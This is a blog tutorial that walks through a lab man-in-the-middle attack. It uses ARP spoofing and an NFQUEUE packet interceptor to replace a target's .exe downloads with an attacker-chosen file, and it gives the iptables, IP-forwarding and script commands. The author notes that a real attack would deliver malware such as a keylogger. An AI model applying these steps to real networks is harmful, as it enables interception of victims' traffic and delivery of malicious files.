Hello friends, today I want to demonstrate how the file_interceptor created in the previous post can be used to replace a file that the target downloads.

My environment contains a Kali Linux VM (Hacker) and a Windows 10 machine (Target).

As usual, to perform a man-in-the-middle attack we need an ARP spoofer, which allows us to receive all of the target's packets.

The first thing to do is enable IP forwarding. Execute these commands on your Linux VM:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -I FORWARD -j NFQUEUE --queue-num 0

The first command enables IP forwarding, and the second sends forwarded packets to netfilter queue 0, where they can be caught and inspected.

Let’s check the ARP table on the target before running the ARP spoofer:

Now let’s run the ARP spoofer:

python arp_spoofing.py -t 10.0.2.4 -g 10.0.2.1
[+] Packets sent: 8

Here -t 10.0.2.4 is the target IP address and -g 10.0.2.1 is the gateway IP address.

And check the ARP table one more time:

Now our Kali Linux VM will receive all of the target's packets.

Now we can start the file interceptor:

python file_interceptor.py -u https://www.win-rar.com/fileadmin/winrar-versions/winrar/wrar560.exe

-u is the URL of the replacement file. When the target tries to download an exe file from the internet, that file will be replaced with our file. Here I am using the WinRAR installation file, but in a real-life example it would be some malware such as a virus, keylogger or something similar.

Now let’s open the target VM and try to download an exe file:

As you can see from this picture, the target is trying to get fbsetup-full.exe but is really receiving wrar560.exe.

You can check the full code on my GitHub.

Check my blog — http://www.devopslife.xyz
